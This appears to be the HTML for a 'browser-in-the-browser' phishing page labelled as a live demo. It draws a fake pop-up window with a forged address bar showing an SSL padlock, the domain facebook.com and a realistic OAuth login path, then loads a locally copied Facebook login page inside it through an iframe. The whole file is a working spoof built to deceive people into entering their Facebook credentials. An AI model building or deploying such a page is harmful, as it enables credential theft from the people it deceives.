<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="style.css">
	  <title>Live demo Project</title>
<link rel="icon" type="image/x-icon" href="../images/hacker.png">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
<div id="window">
<!-- Title bar start -->
<div id="title-bar-width">
	<div id="title-bar">
		<div style="margin-top:5px;">
			<img src="./facebook.png" width="15px" height="15px" id="logo">
			<span id="logo-description">Login with facebook</span>
		</div>

		<div>
			<span id="minimize">&#8212;</span>
			<span id="square">□</span>
			<span id="exit">✕</span>
		</div>
	</div>
	<div id="url-bar">
		<img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
		<span id="domain-name">facebook.com</span>
		<span id="domain-path">/login.php?skip_api_login=1&api_key=525265914179580&kid_directed_site=0&app_id=525265914179580&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fv11.0%2Fdialog%2Foauth%3Fstate%3D9acc3a57-e9e0-4cf7-af72-ec8899870e14%26scope%3Demail%252Cpublic_profile%26respo</span>
	</div>
</div>
<!-- Content start -->
<iframe id="content" src="./origPage/facebook.html" frameBorder="0"></iframe>
</div>
</body>
<script src="script.js"></script>
</html>

